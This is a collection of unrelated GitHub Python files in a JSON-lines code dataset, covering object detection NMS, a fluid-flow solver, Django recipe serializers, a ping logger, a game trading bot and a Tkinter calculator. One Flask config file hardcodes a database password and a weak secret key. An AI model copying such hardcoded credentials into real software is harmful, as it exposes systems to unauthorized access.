start():\n app = init_app()\n web.run_app(app, host='0.0.0.0', port=8080)\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"dsoldatow/doc-backend","sub_path":"doc-backend/src/app/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37348436907","text":"import numpy as np\n\ndef set_cpu_nms(self, dets, thresh):\n \"\"\"\n :dets: 二维numpy.ndarray, 每行6列 [x,y,w,h,score,number],需要保证在同一个set里的boxes的number是唯一的\n :return: bool 型numpy.ndarray, the index of keepded boxes.\n \"\"\"\n def _overlap(det_boxes, basement, others):\n eps = 1e-8\n x1_basement, y1_basement, x2_basement, y2_basement \\\n = det_boxes[basement, 0], det_boxes[basement, 1], \\\n det_boxes[basement, 2], det_boxes[basement, 3]\n x1_others, y1_others, x2_others, y2_others \\\n = det_boxes[others, 0], det_boxes[others, 1], \\\n det_boxes[others, 2], det_boxes[others, 3]\n areas_basement = (x2_basement - x1_basement) * (y2_basement - y1_basement)\n areas_others = (x2_others - x1_others) * (y2_others - y1_others)\n xx1 = np.maximum(x1_basement, x1_others)\n yy1 = np.maximum(y1_basement, y1_others)\n xx2 = np.minimum(x2_basement, x2_others)\n yy2 = np.minimum(y2_basement, y2_others)\n w = np.maximum(0.0, xx2 - xx1)\n h = np.maximum(0.0, yy2 - yy1)\n inter = w * h\n ovr = inter / (areas_basement + areas_others - inter + eps)\n return ovr\n scores = dets[:, 4]\n order = np.argsort(-scores)\n dets = dets[order] #按score从大到小排序\n #change to l t r d\n dets[:,2] = dets[:,2]+dets[:,0]\n dets[:,3] = dets[:,3]+dets[:,1]\n\n numbers = dets[:, -1] # set number\n keep = np.ones(len(dets)) == 1 # keep all at begining\n ruler = np.arange(len(dets)) # ruler = index of order # [0,1,2,3,4.....len]\n while ruler.size>0:\n basement = ruler[0]\n ruler=ruler[1:]\n num = numbers[basement]\n # calculate the body overlap\n overlap = _overlap(dets[:, :4], basement, ruler)\n indices = np.where(overlap > thresh)[0] \n loc = np.where(numbers[ruler][indices] == num)[0] \n # the mask won't change in the step\n mask = keep[ruler[indices][loc]]\n keep[ruler[indices]] = False\n keep[ruler[indices][loc][mask]] = True\n ruler[~keep[ruler]] = -1\n ruler = ruler[ruler>0]\n keep = keep[np.argsort(order)]\n return keep","repo_name":"Harzva/gigavision","sub_path":"my_tools/set_nms.py","file_name":"set_nms.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"9256048676","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 15 10:09:08 2020\r\n\r\n@author: straw\r\n\"\"\"\r\nentry = input(\"Please enter the desired content :\")\r\nfile = open(\"output.txt\", \"w\")\r\nfile.write(entry)\r\nfile.close()\r\n\r\n","repo_name":"kawthar-eltarr/AI-Runtrack-1","sub_path":"jour03/create_output.py","file_name":"create_output.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5176884173","text":"import unittest, os, sys\nfrom custom_test_case import CustomTestCase\n\nPROJECT_ROOT = os.path.dirname(__file__)\nsys.path.append(os.path.join(PROJECT_ROOT, \"..\"))\n\nfrom CodeConverter import CodeConverter\n\nclass TestBugfix(unittest.TestCase, CustomTestCase):\n\n # For Bugfix\n def test_string_including_spaces(self):\n source = '[[UIAlertView alloc] initWithTitle:@\"Warning\" message:@\" too many alerts! \\\" \"];'\n expected = 'UIAlertView.alloc.initWithTitle(\"Warning\",message:\" too many alerts! \\\" \");'\n self.assertSentence(CodeConverter(source).replace_nsstring().convert_square_brackets_expression().s, expected)\n\n def test_multiline_with_block_arg_wont_join_lines(self):\n source = \"\"\"[UIView animateWithDuration:0.2\n animations:^{view.alpha = 0.0;}]\n\"\"\"\n expected = \"\"\"[UIView animateWithDuration:0.2 animations:^{view.alpha = 0.0;}]\n\"\"\"\n self.assertSentence(CodeConverter(source).multilines_to_one_line().s, expected)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"kyamaguchi/SublimeObjC2RubyMotion","sub_path":"tests/test_bugfix.py","file_name":"test_bugfix.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"32"} +{"seq_id":"8184185815","text":"from tempfile import mkdtemp\n\nENV = 'development'\nDEBUG = True\nuri = 'postgres://postgres:11986143@127.0.0.1:5432/project0'\nSQLALCHEMY_DATABASE_URI = uri\nSECRET_KEY = 'Thisisasecret!'\nSQLALCHEMY_TRACK_MODIFICATIONS = True\nTEMPLATES_AUTO_RELOAD = True\nSESSION_PERMANENT = False\nSQLALCHEMY_ECHO = True\n\n# Configure session to use filesystem (instead of signed cookies)\nSESSION_FILE_DIR = mkdtemp()\nSESSION_PERMANENT = False\nSESSION_TYPE = \"filesystem\"\n","repo_name":"no-trbl-2-u/project0","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2779752539","text":"import re\nimport pandas as pd\n\n\npattern = re.compile('.*?(\\w+).*?(-?\\d+.\\d+)')\nresults = []\n\nfor model in 'retinanet', 'fasterrcnn':\n with open(f'./{model}_mean_ap.txt') as f:\n for line in f:\n match = pattern.match(line)\n if match:\n metric, value = match.groups()\n if not metric.endswith(('highlighter', 'spoon', 'candle')):\n results.append((model, metric, float(value)))\n\ndf = (\n pd.DataFrame(results, columns=['Model', 'Metric', 'Value'])\n .set_index(['Model', 'Metric'])\n .unstack('Model')\n .rename(columns={'retinanet': 'RetinaNet', 'fasterrcnn': 'Faster R-CNN'}) # type: ignore\n)\n\n\ndf.index = (\n df.index\n .str.replace('test_', '')\n .str.replace('map', 'mAP')\n .str.replace('mar', 'mAR')\n .str.replace('class_', '')\n .str.replace('_(?=\\d)', '@')\n .str.replace('_', ' ')\n)\n\ndf = df.droplevel(0, axis='columns') # type: ignore\ndf.columns.name = None\n\n\nlatex = df.style.format(precision=3).to_latex(hrules=True) # type: ignore\nprint(latex)\n","repo_name":"k-papadakis/geospatial-labs","sub_path":"5-object-detection/latex/conversions/results_to_latex.py","file_name":"results_to_latex.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"18945791742","text":"\"\"\"Transient laminar channel flow\"\"\"\nimport warnings\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cbook\nfrom spectralDNS import config, get_solver, solve\nwarnings.filterwarnings(\"ignore\", category=matplotlib.cbook.mplDeprecation)\n\ndef initialize(U, U_hat, **context):\n U_hat[:] = 0\n U[:] = 0\n\ndef set_Source(Source, Sk, FST, ST, **context):\n Source[:] = 0\n Source[1, :] = -2./config.params.Re\n Sk[:] = 0\n Sk[1] = FST.scalar_product(Source[1], Sk[1])\n\ndef exact(x, Re, t, num_terms=400):\n beta = 2./Re\n u = np.zeros(len(x))\n for i in range(1, 2*num_terms, 2):\n lam_k = (2*i-1)*np.pi/2.\n lam_kp = (2*(i+1)-1)*np.pi/2.\n u[:] -= np.cos(lam_k*x)*np.exp(-config.params.nu*lam_k**2*t)/lam_k**3\n u[:] += np.cos(lam_kp*x)*np.exp(-config.params.nu*lam_kp**2*t)/lam_kp**3\n u *= (2*beta)/config.params.nu\n u += beta/2./config.params.nu*(1-x**2)\n return u\n\ndef reference(Re, t, num_terms=200):\n u = 1.0\n c = 1.0\n for n in range(1, 2*num_terms, 2):\n a = 32. / (np.pi**3*n**3)\n b = (0.25/Re)*np.pi**2*n**2\n c = -c\n u += a*np.exp(-b*t)*c\n return u\n\nim1 = None\ndef update(context):\n global im1\n params = config.params\n solver = config.solver\n X = context.X\n U = solver.get_velocity(**context)\n if (params.tstep % params.plot_step == 0 and params.plot_step > 0 or\n params.tstep % params.compute_energy == 0):\n U = solver.get_velocity(**context)\n\n if im1 is None and solver.rank == 0 and params.plot_step > 0:\n plt.figure(1)\n #im1 = plt.contourf(X[1][:,:,0], X[0][:,:,0], context.U[1,:,:,0], 100)\n #plt.colorbar(im1)\n #plt.draw()\n #plt.pause(1e-6)\n u_exact = exact(X[0][:, 0, 0], params.Re, params.t)\n plt.plot(X[0][:, 0, 0], U[1, :, 0, 0], 'r', X[0][:, 0, 0], u_exact, 'b')\n\n if params.tstep % params.plot_step == 0 and solver.rank == 0 and params.plot_step > 0:\n #im1.ax.clear()\n #im1.ax.contourf(X[1][:,:,0], X[0][:,:,0], U[1, :, :, 0], 100)\n #im1.autoscale()\n #plt.pause(1e-6)\n plt.figure(1)\n u_exact = exact(X[0][:, 0, 0], params.Re, params.t)\n plt.plot(X[0][:, 0, 0], U[1, :, 0, 0], 'r', X[0][:, 0, 0], u_exact, 'b')\n plt.draw()\n plt.pause(1e-6)\n\n if params.tstep % params.compute_energy == 0:\n u0 = U[1, :, 0, 0].copy()\n uall = None\n if solver.rank == 0:\n uall = np.zeros((solver.num_processes, params.N[0]//solver.num_processes))\n solver.comm.Gather(u0, uall, root=0)\n\n if solver.rank == 0:\n uall = uall.reshape((params.N[0],))\n x0 = context.X[0][:, 0, 0]\n #x = x0\n #pc = zeros(len(x))\n #pc = ST.fct(uall, pc) # Cheb transform of result\n #solution at x = 0\n #u = n_cheb.chebval(0, pc)\n u_exact = exact(x0, params.Re, params.t)\n #print u_exact-uall\n #u_exact = reference(params.Re, params.t)\n print(\"Time %2.5f Error %2.12e \" %(params.t, np.sqrt(np.sum((u_exact-uall)**2)/params.N[0])))\n\ndef regression_test(context):\n params = config.params\n solver = config.solver\n U = solver.get_velocity(**context)\n u0 = U[1, :, 0, 0].copy()\n uall = None\n if solver.rank == 0:\n uall = np.zeros((solver.num_processes, params.N[0]//solver.num_processes))\n\n solver.comm.Gather(u0, uall, root=0)\n if solver.rank == 0:\n uall = uall.reshape((params.N[0],))\n x0 = context.X[0][:, 0, 0]\n #x = x0\n #pc = zeros(len(x))\n #pc = ST.fct(uall, pc) # Cheb transform of result\n #solution at x = 0\n #u = n_cheb.chebval(0, pc)\n #u_exact = reference(params.Re, params.t)\n u_exact = exact(x0, params.Re, params.t)\n print(\"Computed error = %2.8e %2.8e \" %(np.sqrt(np.sum((uall-u_exact)**2)/params.N[0]), params.dt))\n\nif __name__ == \"__main__\":\n config.update(\n {'Re': 800.,\n 'nu': 1./800., # Viscosity\n 'dt': 0.5, # Time step\n 'T': 50., # End time\n 'L': [2, 2*np.pi, 4*np.pi/3.],\n 'M': [6, 5, 2]\n }, \"channel\"\n )\n config.channel.add_argument(\"--compute_energy\", type=int, default=5)\n config.channel.add_argument(\"--plot_step\", type=int, default=10)\n solver = get_solver(update=update, regression_test=regression_test, mesh=\"channel\")\n context = solver.get_context()\n initialize(**context)\n set_Source(**context)\n solve(solver, context)\n","repo_name":"spectralDNS/spectralDNS","sub_path":"demo/LaminarChannel.py","file_name":"LaminarChannel.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":271,"dataset":"github-code","pt":"32"} +{"seq_id":"42479052305","text":"from django.core.exceptions import ValidationError\nfrom django.db.models import F\nfrom django.shortcuts import get_object_or_404\nfrom drf_extra_fields.fields import Base64ImageField\nfrom rest_framework import serializers\n\nfrom recipes.models import (Cart, Favorite, Ingredient, Recipe,\n RecipeIngredient, Tag)\nfrom users.serializers import FoodgramUserListSerializer\n\n\nclass IngredientSerializer(serializers.ModelSerializer):\n\n class Meta:\n fields = '__all__'\n model = Ingredient\n\n\nclass TagSerializer(serializers.ModelSerializer):\n\n class Meta:\n fields = '__all__'\n model = Tag\n\n\nclass RecipeSerializer(serializers.ModelSerializer):\n tags = TagSerializer(many=True, read_only=True)\n author = FoodgramUserListSerializer(read_only=True)\n ingredients = serializers.SerializerMethodField()\n is_favorited = serializers.SerializerMethodField()\n is_in_shopping_cart = serializers.SerializerMethodField()\n image = Base64ImageField()\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'tags',\n 'author',\n 'ingredients',\n 'is_favorited',\n 'is_in_shopping_cart',\n 'name',\n 'image',\n 'text',\n 'cooking_time',\n )\n read_only_fields = (\n 'is_favorite',\n 'is_shopping_cart',\n )\n\n def get_ingredients(self, recipe):\n ingredients = recipe.ingredients.values(\n 'id', 'name', 'measurement_unit', amount=F('recipe__amount')\n )\n return ingredients\n\n def get_is_favorited(self, recipe):\n user = self.context.get('view').request.user\n if user.is_anonymous:\n return False\n return user.favorite.filter(recipe=recipe).exists()\n\n def get_is_in_shopping_cart(self, recipe):\n user = self.context.get('view').request.user\n if user.is_anonymous:\n return False\n return user.cart.filter(recipe=recipe).exists()\n\n def validate(self, data):\n tags_list = self.initial_data.get('tags')\n ingredients = self.initial_data.get('ingredients')\n if not tags_list or not ingredients:\n raise ValidationError('Где теги? Где ингредиенты?')\n exists_tags = Tag.objects.filter(id__in=tags_list)\n if len(exists_tags) != len(tags_list):\n raise ValidationError('Есть несуществующий тег')\n ingredient_dict = {}\n if not ingredients:\n raise serializers.ValidationError(\n 'Минимально должен быть 1 ингредиент'\n )\n for item in ingredients:\n ingredient = get_object_or_404(\n Ingredient, id=item['id']\n )\n if ingredient.pk in ingredient_dict:\n raise serializers.ValidationError(\n 'Ингредиент не должен повторяться'\n )\n if int(item.get('amount')) < 1:\n raise serializers.ValidationError(\n 'Минимальное количество ингредиента = 1'\n )\n ingredient_dict[ingredient.pk] = (ingredient, item.get('amount'))\n data.update({\n 'tags': tags_list,\n 'ingredients': ingredient_dict,\n 'author': self.context.get('request').user\n })\n return data\n\n def create(self, validated_data):\n tags = validated_data.pop('tags')\n ingredients = validated_data.pop('ingredients')\n recipe = Recipe.objects.create(**validated_data)\n recipe.tags.set(tags)\n self.extension(recipe, ingredients)\n return recipe\n\n def update(self, recipe, validated_data):\n tags = validated_data.pop('tags')\n ingredients = validated_data.pop('ingredients')\n if tags:\n recipe.tags.clear()\n recipe.tags.set(tags)\n if ingredients:\n recipe.ingredients.clear()\n self.extension(recipe, ingredients)\n return super().update(recipe, validated_data)\n\n def extension(self, recipe, ingredients):\n objs = []\n for ingredient, amount in ingredients.values():\n objs.append(RecipeIngredient(\n recipe=recipe,\n ingredients=ingredient,\n amount=amount\n ))\n RecipeIngredient.objects.bulk_create(objs)\n\n\nclass FavoriteSerializer(serializers.ModelSerializer):\n\n class Meta:\n fields = '__all__'\n model = Favorite\n\n def validate(self, obj):\n user = self.context['request'].user\n recipe = obj['recipe']\n favorite = user.favorite.filter(recipe=recipe).exists()\n\n if self.context.get('request').method == 'POST' and favorite:\n raise serializers.ValidationError(\n 'Этот рецепт уже добавлен в избранное'\n )\n if self.context.get('request').method == 'DELETE' and not favorite:\n raise serializers.ValidationError(\n 'Этот рецепт отсутствует в избранном'\n )\n return obj\n\n\nclass CartSerializer(serializers.ModelSerializer):\n\n class Meta:\n fields = '__all__'\n model = Cart\n\n def validate(self, obj):\n user = self.context['request'].user\n recipe = obj['recipe']\n cart = user.cart.filter(recipe=recipe).exists()\n\n if self.context.get('request').method == 'POST' and cart:\n raise serializers.ValidationError(\n 'Этот рецепт уже добавлен в корзину'\n )\n if self.context.get('request').method == 'DELETE' and not cart:\n raise serializers.ValidationError(\n 'Этот рецепт отсутствует в корзине'\n )\n return obj\n","repo_name":"ABCTPu9IHOB/foodgram-project-react","sub_path":"backend/recipes/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32451219276","text":"from PetaSAN.core.common.enums import NodeStatus\nfrom PetaSAN.core.common.log import logger\nfrom PetaSAN.core.consul.api import ConsulAPI\nfrom PetaSAN.core.notification.base import CheckBasePlugin,NotifyContext, Result\nfrom PetaSAN.core.common.messages import gettext\n\nclass NodeDownPlugin(CheckBasePlugin):\n def __init__(self,context):\n self.__context = context\n\n\n def is_enable(self):\n return True\n\n\n def run(self):\n self.__notify_list()\n\n def get_plugin_name(self):\n return self.__class__.__name__\n\n\n\n def __get_down_node_list(self):\n down_node_list = []\n try:\n con_api = ConsulAPI()\n node_list = con_api.get_node_list()\n consul_members = con_api.get_consul_members()\n for i in node_list:\n if i.name not in consul_members:\n i.status = NodeStatus.down\n down_node_list.append(i.name)\n return down_node_list\n except Exception as e:\n logger.exception(\"error get down node list\")\n return down_node_list\n\n def __notify_list(self):\n try:\n result = Result()\n old_node_list = self.__context.state.get(self.get_plugin_name(),[])\n down_node_list = self.__get_down_node_list()\n for node in down_node_list:\n if node not in old_node_list:\n result.message= '\\n'.join(gettext(\"core_message_notify_down_node_list\").split(\"\\\\n\")).format(''.join('\\n- node:{} '.format(node) for node in down_node_list))\n #logger.warning(result.message)\n result.plugin_name=str(self.get_plugin_name())\n result.title = gettext(\"core_message_notify_down_node_list_title\")\n self.__context.results.append(result)\n break\n self.__context.state[self.get_plugin_name()]= down_node_list\n except Exception as e:\n logger.exception(\"error notify down node list\")\n","repo_name":"robertoberto/petasan","sub_path":"storage-appliance/usr/lib/python2.7/dist-packages/PetaSAN/core/notification/plugins/check/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"8767937419","text":"import pickle\nfrom sklearn.linear_model import Ridge\nimport numpy as np\n\nf = open('data.pkl','rb')\ndata = pickle.load(f)\nf.close()\nwith open('test.csv', 'r') as f:\n test = []\n csv_data = f.read().split('\\n')\n for row in csv_data[1:]:\n if len(row) == 0:\n break\n row = row.split(',')\n test.append((row[1],row[2]))\nresult = []\nfor shop_id in range(60):\n x,y = [],[]\n print('shop_id:%d'%(shop_id))\n for month_id in range(34):\n tmpx,tmpy = [],[]\n month = int(month_id%12)\n year = int(month_id//12)\n for item_id in range(22170):\n price = (np.sum(data[shop_id][month_id][item_id]['price']) / 30)/1000\n cnt = np.sum(data[shop_id][month_id][item_id]['cnt_day']) / 30\n tmpx.extend([year, month, price])\n tmpy.append(cnt)\n x.append(tmpx)\n y.append(tmpy)\n x = np.array(x)\n y = np.array(y)\n clf = Ridge(alpha=1.0).fit(x[:-1],y[:-1])\n # create pred\n test_x = []\n month_id = 34\n for item_id in range(22170):\n price = (np.sum(data[shop_id][month_id - 1][item_id]['price']) / 30)/1000\n test_x.extend([year, month, price])\n pred = clf.predict(np.array([test_x]))\n result.append(pred[0])\n\nwith open('result.csv', 'w') as f:\n idx = 0\n f.write('ID,item_cnt_month\\n')\n for shop_id,item_id in test:\n f.write('%d,%f\\n'%(idx,result[int(shop_id)][int(item_id)]))\n idx += 1\n\n \n \n\n\n\n \n\n\n\n\n","repo_name":"ben85824/DSAI-Midterm-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6241892919","text":"\"\"\"\na program that accepts sequence of lines as input and prints the lines \nafter making all characters in the sentence capitalised. \n\n\"\"\"\n\ndef Upper_case():\n\tstring = input(\"enter sentence:\")\n\tif type(string) is str:\n\t\treturn string.upper()\n\telse:\n\t\tprint('invalid input: please enter a string')\n\t\treturn print(Upper_case())\n\n\n\nprint(Upper_case())","repo_name":"kalungiconrad/py-practice","sub_path":"upper_case.py","file_name":"upper_case.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10016759075","text":"\"\"\"\n1. Отсортируйте по убыванию методом пузырька одномерный целочисленный массив,\nзаданный случайными числами на промежутке [-100; 100). ��ыведите на экран исходный и отсортированный массивы.\nПримечания:\na. алгоритм сортировки должен быть в виде функции, которая принимает на вход массив данных,\nb. постарайтесь сделать алгоритм умнее, но помните, что у вас должна остаться сортировка пузырьком.\nУлучшенные версии сортировки, например, расчёской, шейкерная и другие в зачёт не идут.\n\nbubble_desc - метод пузырька без улучшений\nbubble_desc_adv - метод пузырька с улучшением - если во внутреннем цикле не произошло ни одного обмена,\nзначит массив отсортирован, можно завершить внешний цикл.\nРезультаты замеров времени для обоих видов сортировки, улучшенный метод быстрее где-то на 5%:\npython -m timeit -n 100 -s \"import les_7_task_1\" \"les_7_task_1.bubble_desc()\"\n100 loops, best of 5: 80.5 msec per loop\npython -m timeit -n 100 -s \"import les_7_task_1\" \"les_7_task_1.bubble_desc_adv()\"\n100 loops, best of 5: 76.4 msec per loop\n\"\"\"\nimport random\nimport copy\n\n\ndef bubble_desc(arr):\n n = 1\n while n < len(arr):\n k = 0\n for i in range(len(arr) - n):\n if arr[i] < arr[i + 1]:\n arr[i], arr[i + 1] = arr[i + 1], arr[i]\n k += 1\n n += 1\n return arr\n\n\ndef bubble_desc_adv(arr):\n n = 1\n end_idx = len(arr)\n while n < end_idx:\n k = False\n for i in range(end_idx - n):\n if arr[i] < arr[i + 1]:\n arr[i], arr[i + 1] = arr[i + 1], arr[i]\n k = True\n if not k:\n break\n n += 1\n return arr\n\n\nlst = [random.randint(-100, 99) for _ in range(20)]\n\nprint(f'Начальный массив: {lst}')\nlst_1 = bubble_desc(copy.deepcopy(lst))\nprint(f'Отсортированный массив: {lst_1}')\nlst_2 = bubble_desc_adv(copy.deepcopy(lst))\nprint(f'Отсортированный массив улучшенный: {lst_2}')\nprint(f'Равны ли отсортированные массивы: {lst_1 == lst_2}')\n","repo_name":"damkh/gb_py_alg_2020-07","sub_path":"les_7/les_7_task_1.py","file_name":"les_7_task_1.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19167845865","text":"# --- IMPORTS ---\nimport subprocess\nimport time\n# ---------------\n\nclass Pinger:\n def __init__(self, messages=False, os=\"WINDOWS\") -> None:\n \"\"\"Initializes Pinger class,\\n\n Non-input Attributes:\n cmd (array): subprocess library, array of commands. Currently windows ping command.\\n\n results (None): Stores ping results, initializes as None\\n\n\n Args:\n messages (bool, optional): Show all ping results?. Defaults to False.\n os (str, optional): \"WINDOWS\" or \"MACOS\". Changes ping command. Defaults to \"WINDOWS\".\n \"\"\"\n self.os = os\n\n self.cmd = ['ping', '-n', '1','8.8.8.8']\n\n self.results = None\n self.messages = messages\n print(\"Press 'Control+C' to quit! Otherwise, this will continuously run!\\n .run() to run test, see README for other commands\")\n\n # --- Getters, Setters ---\n def getCMD(self):\n return self.cmd\n\n def setCMD(self, cmd):\n self.cmd = cmd\n\n def getOS(self):\n return self.os\n\n def setOS(self, os):\n self.os = os\n if self.os == \"WINDOWS\":\n self.cmd = ['ping', '-n', '1','8.8.8.8']\n elif self.os == \"MACOS\":\n self.cmd = ['ping', '-c', '1', '8.8.8.8']\n else:\n print(\"Unsupported OS, Defaulting to WINDOWS\")\n self.os = \"WINDOWS\"\n self.cmd = ['ping', '-n', '1','8.8.8.8']\n\n def getMessages(self):\n return self.messages\n\n def setMessages(self, messages):\n self.messages = messages\n # ------------------------\n\n # --- Results/Logic ---\n def getAllResults(self):\n if self.messages == True:\n print(\"All results: \\n%s\\n\" % (self.results))\n return self.results\n\n def getBadResults(self):\n shouldLog = False\n\n if \"bytes\" not in self.results:\n _time = time.ctime()\n print(\"Timestamp: \\n%s\\nMessage: %s\" % (_time, self.results))\n shouldLog = True\n\n if shouldLog == True:\n with open(\"LOGGER.txt\", \"a\") as myfile:\n myfile.write(_time)\n myfile.write(self.results)\n myfile.write(\"__________________________\\n\")\n\n def logger(self): \n try:\n self.results = (\"\".join(map(chr, subprocess.check_output(self.cmd, stderr=subprocess.STDOUT))))\n except subprocess.CalledProcessError as e:\n self.results = (\"DOWN %s\" % (time.ctime()))\n with open(\"LOGGER.txt\", \"a\") as myfile:\n myfile.write(self.results)\n myfile.write(\"__________________________\\n\")\n time.sleep(1)\n self.logger()\n return self.results\n\n def run(self):\n try:\n while True:\n self.logger()\n self.getAllResults()\n self.getBadResults()\n time.sleep(1)\n except KeyboardInterrupt:\n pass\n\n # --------------------","repo_name":"seanpden/pingerTool","sub_path":"pinger.py","file_name":"pinger.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72557718490","text":"import pyautogui\nimport math\nfrom constants import CELL_SIZE, CURRENCY_TAB, WIDTH, HEIGHT, TRADE_WINDOW, PYAUTOGUI_SPEED, TRADE_VERIFY_RETRIES\nfrom stash.empty_equipment import empty_equipment\nfrom trade.TradeException import TradeException\nfrom trade.accept_trade import accept_trade\nfrom trade.trade_waits import wait_for_window\nfrom utils.chat_utils import trade_user\nfrom utils.resetCursor import reset_cursor\nfrom utils.prefix_print import printtime\nimport pyperclip\nimport re\nimport time\n\n\ndef trade_currency_for_currency(trade_order, n=0):\n if n == 2:\n return\n sell_currency_config = CURRENCY_TAB[trade_order.sell_currency]\n sell_cells = math.ceil(trade_order.sell_amount / sell_currency_config['stackSize'])\n trade_user(trade_order.buyer)\n trade_started = wait_for_window()\n if trade_started:\n # Double Checking the tradeWindow to prevent errors\n if pyautogui.locate('images/tradeWindow.png', pyautogui.screenshot(region=(296, 496, 664, 362))):\n empty_equipment(sell_cells)\n reset_cursor()\n\n TRADE_VERIFIED_TIMES = 0 # Have Problem Moving this into constants.py\n\n try:\n while TRADE_VERIFIED_TIMES < TRADE_VERIFY_RETRIES:\n pyautogui.PAUSE = 0.001\n\n total_amount = 0\n BROWSE_ITEM = True\n VERIFY_ITEM = False\n\n time.sleep(5)\n\n if TRADE_VERIFIED_TIMES > 1:\n if pyautogui.locate('images/acceptTradeItems.png', pyautogui.screenshot(region=(486, 824, 282, 25))):\n BROWSE_ITEM = True\n else:\n BROWSE_ITEM = False\n\n while BROWSE_ITEM:\n if pyautogui.locate('images/acceptTradeItems.png', pyautogui.screenshot(region=(486, 824, 282, 25))):\n for col in range(WIDTH):\n for row in range(HEIGHT):\n pyautogui.moveTo(TRADE_WINDOW['start']['x']+col*TRADE_WINDOW[CELL_SIZE],\n TRADE_WINDOW['start']['y']+row*TRADE_WINDOW[CELL_SIZE])\n VERIFY_ITEM = True\n elif not pyautogui.locate('images/acceptTradeItems.png', pyautogui.screenshot(region=(486, 824, 282, 25))):\n BROWSE_ITEM = False\n\n if VERIFY_ITEM:\n for col in range(WIDTH):\n for row in range(HEIGHT):\n try:\n pyautogui.moveTo(TRADE_WINDOW['start']['x']+col*TRADE_WINDOW[CELL_SIZE],\n TRADE_WINDOW['start']['y']+row*TRADE_WINDOW[CELL_SIZE])\n pyautogui.keyDown('CTRL')\n pyautogui.press('C')\n pyautogui.keyUp('CTRL')\n clipboard_data = pyperclip.paste().replace('\\r', '').replace('\\n', ' - ')\n currency_data = re.match(\n '.+Rarity: \\w+ - (.+) - -+ - Stack Size: (\\d+).+', clipboard_data)\n cell_currency = currency_data.group(1)\n cell_amount = int(currency_data.group(2))\n pyperclip.copy('')\n if cell_currency != trade_order.buy_currency:\n raise TradeException('Wrong currency')\n total_amount += cell_amount\n\n if total_amount == trade_order.buy_amount:\n break\n except Exception as e:\n pass\n\n if total_amount == trade_order.buy_amount:\n break\n if total_amount == trade_order.buy_amount:\n break\n\n TRADE_VERIFIED_TIMES += 1\n\n if TRADE_VERIFIED_TIMES == TRADE_VERIFY_RETRIES:\n printtime(f\"Trading with {trade_order.buyer} failed...\")\n pyautogui.press('ESC')\n return\n\n except Exception as e:\n printtime(f\"Trading Error: {e}...\")\n pyautogui.press('ESC')\n pyautogui.PAUSE = PYAUTOGUI_SPEED # set back to default stable value\n return\n\n pyautogui.PAUSE = PYAUTOGUI_SPEED # set back to default value\n trade_order.update_buy_amount(total_amount)\n accept_trade()\n else:\n printtime(\"Trade didn't accpet.. retry in 5 seconds\")\n pyautogui.sleep(5)\n trade_currency_for_currency(trade_order, n + 1)\n","repo_name":"FrozenTear7/poe-trading-bot","sub_path":"trade/trade_currency_for_currency.py","file_name":"trade_currency_for_currency.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"22216963550","text":"import math\nfrom tkinter import * \n\n#change\n\nroot = Tk()\nroot.title(\"Simple Calculator\")\n\ne = Entry(root, width = 35, borderwidth = 5)\ne.grid(row = 0, column = 0, columnspan = 3, padx = 10, pady = 10)\n# e.insert(0, \"Enter Your Name:\")\n\n\ndef button_click(number):\n current = e.get()\n e.delete(0, END)\n e.insert(0, str(current) + str(number))\n return\n\ndef button_clear():\n e.delete(0, END)\n\ndef button_add():\n first_number = e.get()\n global f_num\n global math \n math = \"addition\"\n f_num = int(first_number)\n e.delete(0, END)\n return\n\ndef button_equal():\n second_number = e.get()\n e.delete(0, END)\n if math == \"addition\":\n e.insert(0, f_num + int(second_number))\n if math == \"subtration\":\n e.insert(0, f_num - int(second_number))\n if math == \"multiplication\":\n e.insert(0, f_num * int(second_number))\n if math == \"division\":\n e.insert(0, f_num / int(second_number))\n if math == \"power\":\n e.insert(0, f_num**int(second_number))\n return\n\ndef button_sub():\n first_number = e.get()\n global f_num\n global math \n math = \"subtraction\"\n f_num = int(first_number)\n e.delete(0, END)\n return\n\ndef button_mul():\n first_number = e.get()\n global f_num\n global math \n math = \"multiplication\"\n f_num = int(first_number)\n e.delete(0, END)\n return\n\ndef button_div():\n first_number = e.get()\n global f_num\n global math \n math = \"division\"\n f_num = int(first_number)\n e.delete(0, END)\n return\n\ndef button_power():\n first_number = e.get()\n global f_num\n global math \n math = 